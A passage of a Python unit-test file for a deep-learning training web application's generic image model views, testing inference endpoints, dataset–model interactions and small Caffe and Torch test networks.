s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)
        headers = s.select('table.table th')
        assert headers, 'unrecognized page format'
def test_infer_db(self):
if self.val_db_path is None:
raise unittest.SkipTest('Class has no validation db')
rv = self.app.post(
'/models/images/generic/infer_db?job_id=%s' % self.model_id,
data={'db_path': self.val_db_path}
)
s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)
        headers = s.select('table.table th')
        assert headers, 'unrecognized page format'
def test_infer_many_from_folder(self):
textfile_images = '%s\n' % os.path.basename(self.test_image)
# StringIO wrapping is needed to simulate POST file upload.
file_upload = (StringIO(textfile_images), 'images.txt')
# try selecting the extension explicitly
extension = extensions.view.get_default_extension()
extension_id = extension.get_id()
rv = self.app.post(
'/models/images/generic/infer_many?job_id=%s' % self.model_id,
data={'image_list': file_upload,
'image_folder': os.path.dirname(self.test_image),
'view_extension_id': extension_id}
)
s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)
        headers = s.select('table.table th')
        assert headers, 'unrecognized page format'
def test_infer_many_json(self):
textfile_images = '%s\n' % self.test_image
# StringIO wrapping is needed to simulate POST file upload.
file_upload = (StringIO(textfile_images), 'images.txt')
rv = self.app.post(
'/models/images/generic/infer_many.json?job_id=%s' % self.model_id,
data={'image_list': file_upload}
)
assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
data = json.loads(rv.data)
assert 'outputs' in data, 'invalid response'
def test_infer_db_json(self):
if self.val_db_path is None:
raise unittest.SkipTest('Class has no validation db')
rv = self.app.post(
'/models/images/generic/infer_db.json?job_id=%s' % self.model_id,
data={'db_path': self.val_db_path}
)
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, rv.data)
data = json.loads(rv.data)
assert 'outputs' in data, 'invalid response'
class BaseTestCreated(BaseTestCreatedWithAnyDataset,
digits.dataset.images.generic.test_views.BaseViewsTestWithDataset):
"""
Tests on a model that has already been created with an "images/generic" dataset
"""
pass
class BaseTestCreatedWithGradientDataExtension(BaseTestCreatedWithAnyDataset,
digits.dataset.generic.test_views.BaseViewsTestWithDataset):
"""
Tests on a model that has already been created with a "generic" dataset,
using the gradients extension in that instance
"""
EXTENSION_ID = "image-gradients"
@classmethod
def setUpClass(cls, **kwargs):
if not hasattr(cls, 'imageset_folder'):
# Create test image
cls.imageset_folder = tempfile.mkdtemp()
image_width = cls.IMAGE_WIDTH
image_height = cls.IMAGE_HEIGHT
yy, xx = np.mgrid[:image_height,
:image_width].astype('float')
xslope, yslope = 0.5, 0.5
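            # build a linear ramp image with a known slope (0.5) in both x and y
            # for the single-image inference tests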
a = xslope * 255 / image_width
b = yslope * 255 / image_height
test_image = a * (xx - image_width / 2) + b * (yy - image_height / 2) + 127.5
test_image = test_image.astype('uint8')
pil_img = PIL.Image.fromarray(test_image)
cls.test_image = os.path.join(cls.imageset_folder, 'test.png')
pil_img.save(cls.test_image)
        # note: model created in BaseViewsTestWithModelWithAnyDataset.setUpClass
super(BaseTestCreatedWithGradientDataExtension, cls).setUpClass()
def test_infer_extension_json(self):
rv = self.app.post(
'/models/images/generic/infer_extension.json?job_id=%s' % self.model_id,
data={
'gradient_x': 0.5,
'gradient_y': -0.5,
}
)
assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
data = json.loads(rv.data)
output = data['outputs'][data['outputs'].keys()[0]]['output']
        assert output[0] > 0 and \
            output[1] < 0, \
            'image regression result is wrong: %s' % str(output)
class BaseTestCreatedWithImageProcessingExtension(
BaseTestCreatedWithAnyDataset,
digits.dataset.generic.test_views.BaseViewsTestWithDataset):
"""
Test Image processing extension with a dummy identity network
"""
CAFFE_NETWORK = \
"""
layer {
name: "identity"
type: "Power"
bottom: "data"
top: "output"
}
layer {
name: "loss"
type: "EuclideanLoss"
bottom: "output"
bottom: "label"
top: "loss"
exclude { stage: "deploy" }
}
"""
TORCH_NETWORK = \
"""
return function(p)
return {
-- simple identity network
model = nn.Sequential():add(nn.Identity()),
loss = nn.MSECriterion(),
}
end
"""
EXTENSION_ID = "image-processing"
VARIABLE_SIZE_DATASET = False
NUM_IMAGES = 100
MEAN = 'none'
@classmethod
def setUpClass(cls, **kwargs):
if cls.VARIABLE_SIZE_DATASET:
cls.BATCH_SIZE = 1
cls.create_variable_size_random_imageset(
num_images=cls.NUM_IMAGES)
else:
cls.create_random_imageset(
num_images=cls.NUM_IMAGES,
image_width=cls.IMAGE_WIDTH,
image_height=cls.IMAGE_HEIGHT)
super(BaseTestCreatedWithImageProcessingExtension, cls).setUpClass(
feature_folder=cls.imageset_folder,
label_folder=cls.imageset_folder,
channel_conversion='L',
dsopts_force_same_shape='0' if cls.VARIABLE_SIZE_DATASET else '1',
use_mean=cls.MEAN)
def test_infer_one_json(self):
image_path = os.path.join(self.imageset_folder, self.test_image)
with open(image_path, 'rb') as infile:
# StringIO wrapping is needed to simulate POST file upload.
image_upload = (StringIO(infile.read()), 'image.png')
rv = self.app.post(
'/models/images/generic/infer_one.json?job_id=%s' % self.model_id,
data={'image_file': image_upload}
)
assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
data = json.loads(rv.data)
data_shape = np.array(data['outputs']['output']).shape
if not self.VARIABLE_SIZE_DATASET:
            # network output is NCHW (cf. the no-resize shape check below)
            assert data_shape == (1, self.CHANNELS, self.IMAGE_HEIGHT, self.IMAGE_WIDTH)
def test_infer_one_noresize_json(self):
# create large random image
shape = (self.CHANNELS, 10 * self.IMAGE_HEIGHT, 5 * self.IMAGE_WIDTH)
x = np.random.randint(
low=0,
high=256,
size=shape)
if self.CHANNELS == 1:
# drop channel dimension
x = x[0]
x = x.astype('uint8')
pil_img = PIL.Image.fromarray(x)
# create output stream
s = StringIO()
pil_img.save(s, format="png")
# create input stream
s = StringIO(s.getvalue())
image_upload = (s, 'image.png')
# post request
rv = self.app.post(
'/models/images/generic/infer_one.json?job_id=%s' % self.model_id,
data={'image_file': image_upload, 'dont_resize': 'y'}
)
assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
data = json.loads(rv.data)
data_shape = np.array(data['outputs']['output']).shape
assert data_shape == (1,) + shape
def test_infer_db(self):
if self.VARIABLE_SIZE_DATASET:
raise unittest.SkipTest('Skip variable-size inference test')
super(BaseTestCreatedWithImageProcessingExtension, self).test_infer_db()
def test_infer_db_json(self):
if self.VARIABLE_SIZE_DATASET:
raise unittest.SkipTest('Skip variable-size inference test')
super(BaseTestCreatedWithImageProcessingExtension, self).test_infer_db_json()
class BaseTestDatasetModelInteractions(BaseViewsTestWithDataset):
"""
Test the interactions between datasets and models
"""
# If you try to create a model using a deleted dataset, it should fail
def test_create_model_deleted_dataset(self):
dataset_id = self.create_dataset()
assert self.delete_dataset(dataset_id) == 200, 'delete failed'
assert not self.dataset_exists(dataset_id), 'dataset exists after delete'
try:
self.create_model(dataset=dataset_id)
except RuntimeError:
return
assert False, 'Should have failed'
# If you try to create a model using a running dataset,
# it should wait to start until the dataset is completed
def test_create_model_running_dataset(self):
dataset_id = self.create_dataset()
model_id = self.create_model(dataset=dataset_id)
# Model should be in WAIT status while dataset is running
# Copying functionality from job_wait_completion ...
start_time = time.time()
timeout = TIMEOUT_DATASET
dataset_status = self.dataset_status(dataset_id)
while dataset_status != 'Done':
model_status = self.model_status(model_id)
if model_status == 'Initialized':
# give it some time ...
pass
elif model_status == 'Waiting':
# That's what we were waiting for
break
else:
raise Exception('Model not waiting - "%s"' % model_status)
assert (time.time() - start_time) < timeout, 'Job took more than %s seconds' % timeout
time.sleep(0.5)
dataset_status = self.dataset_status(dataset_id)
# Model should switch to RUN status after dataset is DONE
assert self.dataset_wait_completion(dataset_id) == 'Done', 'dataset creation failed'
time.sleep(1)
assert self.model_status(model_id) in ['Running', 'Done'], "model didn't start"
self.abort_model(model_id)
# If you try to delete a completed dataset with a dependent model, it should fail
def test_delete_dataset_dependent_model(self):
dataset_id = self.create_dataset()
model_id = self.create_model(dataset=dataset_id)
assert self.dataset_wait_completion(dataset_id) == 'Done', 'dataset creation failed'
assert self.delete_dataset(dataset_id) == 403, 'dataset deletion should not have succeeded'
self.abort_model(model_id)
# If you try to delete a running dataset with a dependent model, it should fail
def test_delete_running_dataset_dependent_model(self):
dataset_id = self.create_dataset()
model_id = self.create_model(dataset=dataset_id)
assert self.delete_dataset(dataset_id) == 403, 'dataset deletion should not have succeeded'
self.abort_dataset(dataset_id)
self.abort_model(model_id)
class BaseTestCreatedCropInNetwork(BaseTestCreated):
CAFFE_NETWORK = \
"""
layer {
name: "data"
type: "Data"
top: "data"
include {
phase: TRAIN
}
transform_param {
crop_size: 8
}
}
layer {
name: "data"
type: "Data"
top: "data"
include {
phase: TEST
}
transform_param {
crop_size: 8
}
}
layer {
name: "scale"
type: "Power"
bottom: "data"
top: "scale"
power_param {
scale: 0.004
}
}
layer {
name: "hidden"
type: "InnerProduct"
bottom: "scale"
top: "output"
inner_product_param {
num_output: 2
}
}
layer {
name: "loss"
type: "EuclideanLoss"
bottom: "output"
bottom: "label"
top: "loss"
exclude { stage: "deploy" }
}
"""
TORCH_NETWORK = \
"""
return function(p)
local croplen = 8, channels
if p.inputShape then channels=p.inputShape[1] else channels=1 end
local net = nn.Sequential()
net:add(nn.MulConstant(0.004))
net:add(nn.View(-1):setNumInputDims(3)) -- flatten
-- set all weights and biases to zero as this speeds learning up
-- for the type of problem we're trying to solve in this test
local linearLayer = nn.Linear(channels*croplen*croplen, 2)
linearLayer.weight:fill(0)
linearLayer.bias:fill(0)
net:add(linearLayer) -- c*croplen*croplen -> 2
return {
model = net,
loss = nn.MSECriterion(),
croplen = croplen
}
end
"""
class BaseTestCreatedCropInForm(BaseTestCreated):
CROP_SIZE = 8
################################################################################
# Test classes
################################################################################
class TestCaffeViews(BaseTestViews, test_utils.CaffeMixin):
pass
class TestCaffeCreation(BaseTestCreation, test_utils.CaffeMixin):
pass
class TestCaffeCreated(BaseTestCreated, test_utils.CaffeMixin):
pass
class TestCaffeCreatedWithGradientDataExtension(
BaseTestCreatedWithGradientDataExtension, test_utils.CaffeMixin):
pass
class TestCaffeCreatedWithGradientDataExtensionNoValSet(
BaseTestCreatedWithGradientDataExtension, test_utils.CaffeMixin):
@classmethod
def setUpClass(cls):
super(TestCaffeCreatedWithGradientDataExtensionNoValSet, cls).setUpClass(val_image_count=0)
class TestCaffeCreatedWithImageProcessingExtensionMeanImage(
BaseTestCreatedWithImageProcessingExtension, test_utils.CaffeMixin):
MEAN = 'image'
class TestCaffeCreatedWithImageProcessingExtensionMeanPixel(
BaseTestCreatedWithImageProcessingExtension, test_utils.CaffeMixin):
MEAN = 'pixel'
class TestCaffeCreatedWithImageProcessingExtensionMeanNone(
BaseTestCreatedWithImageProcessingExtension, test_utils.CaffeMixin):
MEAN = 'none'
class TestCaffeCreatedVariableSizeDataset(
BaseTestCreatedWithImageProcessingExtension, test_utils.CaffeMixin):
MEAN = 'none'
VARIABLE_SIZE_DATASET = True
class TestCaffeDatasetModelInteractions(BaseTestDatasetModelInteractions, test_utils.CaffeMixin):
pass
class TestCaffeCreatedCropInNetwork(BaseTestCreatedCropInNetwork, test_utils.CaffeMixin):
pass
class TestCaffeCreatedCropInForm(BaseTestCreatedCropInForm, test_utils.CaffeMixin):
pass
class TestTorchViews(BaseTestViews, test_utils.TorchMixin):
pass
class TestTorchCreation(BaseTestCreation, test_utils.TorchMixin):
pass
class TestTorchCreated(BaseTestCreated, test_utils.TorchMixin):
pass
class TestTorchCreatedWithGradientDataExtension(
BaseTestCreatedWithGradientDataExtension, test_utils.TorchMixin):
pass
class TestTorchCreatedWithGradientDataExtensionNoValSet(
BaseTestCreatedWithGradientDataExtension, test_utils.TorchMixin):
@classmethod
def setUpClass(cls):
super(TestTorchCreatedWithGradientDataExtensionNoValSet, cls).setUpClass(val_image_count=0)
class TestTorchCreatedWithImageProcessingExtensionMeanImage(
BaseTestCreatedWithImageProcessingExtension, test_utils.TorchMixin):
MEAN = 'image'
class TestTorchCreatedWithImageProcessingExtensionMeanPixel(
BaseTestCreatedWithImageProcessingExtension, test_utils.TorchMixin):
MEAN = 'pixel'
class TestTorchCreatedWithImageProcessingExtensionMeanNone(
BaseTestCreatedWithImageProcessingExtension, test_utils.TorchMixin):
MEAN = 'none'
class TestTorchCreatedVariableSizeDataset(
BaseTestCreatedWithImageProcessingExtension, test_utils.TorchMixin):
MEAN = 'none'
VARIABLE_SIZE_DATASET = True
class TestTorchCreatedCropInNetwork(BaseTestCreatedCropInNetwork, test_utils.TorchMixin):
pass
class TestTorchCreatedCropInForm(BaseTestCreatedCropInForm, test_utils.TorchMixin):
pass
class TestTorchDatasetModelInteractions(BaseTestDatasetModelInteractions, test_utils.TorchMixin):
pass
class TestTorchTableOutput(BaseTestCreated, test_utils.TorchMixin):
TORCH_NETWORK = \
"""
return function(p)
-- same network as in class BaseTestCreated except that each gradient
-- is learnt separately: the input is fed into nn.ConcatTable and
-- each branch outputs one of the gradients
local nDim = 1
if p.inputShape then p.inputShape:apply(function(x) nDim=nDim*x end) end
local net = nn.Sequential()
net:add(nn.MulConstant(0.004))
net:add(nn.View(-1):setNumInputDims(3)) -- flatten
-- set all weights and biases to zero as this speeds learning up
-- for the type of problem we're trying to solve in this test
local linearLayer1 = nn.Linear(nDim, 1)
linearLayer1.weight:fill(0)
linearLayer1.bias:fill(0)
local linearLayer2 = nn.Linear(nDim, 1)
linearLayer2.weight:fill(0)
linearLayer2.bias:fill(0)
-- create concat table
local parallel = nn.ConcatTable()
parallel:add(linearLayer1):add(linearLayer2)
net:add(parallel)
-- create two MSE criteria to optimize each gradient separately
local mse1 = nn.MSECriterion()
local mse2 = nn.MSECriterion()
-- now create a criterion that takes as input each of the two criteria
local finalCriterion = nn.ParallelCriterion(false):add(mse1):add(mse2)
-- create label hook
function labelHook(input, dblabel)
-- split label alongside 2nd dimension
local labelTable = dblabel:split(1,2)
return labelTable
end
return {
model = net,
loss = finalCriterion,
labelHook = labelHook,
}
end
"""
class TestTorchNDOutput(BaseTestCreated, test_utils.TorchMixin):
CROP_SIZE = 8
TORCH_NETWORK = \
"""
return function(p)
-- this model just forwards the input as is
local net = nn.Sequential():add(nn.Identity())
-- create label hook
function labelHook(input, dblabel)
return input
end
return {
model = net,
loss = nn.AbsCriterion(),
labelHook = labelHook,
}
end
"""
def test_infer_one_json(self):
image_path = os.path.join(self.imageset_folder, self.test_image)
with open(image_path, 'rb') as infile:
# StringIO wrapping is needed to simulate POST file upload.
image_upload = (StringIO(infile.read()), 'image.png')
rv = self.app.post(
'/models/images/generic/infer_one.json?job_id=%s' % self.model_id,
data={
'image_file': image_upload,
}
)
assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
# make sure the shape of the output matches the shape of the input
data = json.loads(rv.data)
output = np.array(data['outputs']['output'][0])
assert output.shape == (1, self.CROP_SIZE, self.CROP_SIZE), \
'shape mismatch: %s' % str(output.shape)
class TestSweepCreation(BaseViewsTestWithDataset, test_utils.CaffeMixin):
"""
Model creation tests
"""
def test_sweep(self):
job_ids = self.create_model(json=True, learning_rate='[0.01, 0.02]', batch_size='[8, 10]')
for job_id in job_ids:
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
assert self.delete_model(job_id) == 200, 'delete failed'
assert not self.model_exists(job_id), 'model exists after delete'
class TestAllInOneNetwork(BaseTestCreation, BaseTestCreated, test_utils.CaffeMixin):
"""
Test an all-in-one network
"""
CAFFE_NETWORK = \
"""
layer {
name: "train_data"
type: "Data"
top: "scaled_data"
transform_param {
scale: 0.004
}
include { phase: TRAIN }
}
layer {
name: "train_label"
type: "Data"
top: "label"
include { phase: TRAIN }
}
layer {
name: "val_data"
type: "Data"
top: "scaled_data"
transform_param {
scale: 0.004
}
include { phase: TEST }
}
layer {
name: "val_label"
type: "Data"
top: "label"
include { phase: TEST }
}
layer {
name: "scale"
type: "Power"
bottom: "data"
top: "scaled_data"
power_param {
scale: 0.004
}
include { stage: "deploy" }
}
layer {
name: "hidden"
type: "InnerProduct"
bottom: "scaled_data"
top: "output"
inner_product_param {
num_output: 2
}
}
layer {
name: "loss"
type: "EuclideanLoss"
bottom: "output"
bottom: "label"
top: "loss"
exclude { stage: "deploy" }
}
"""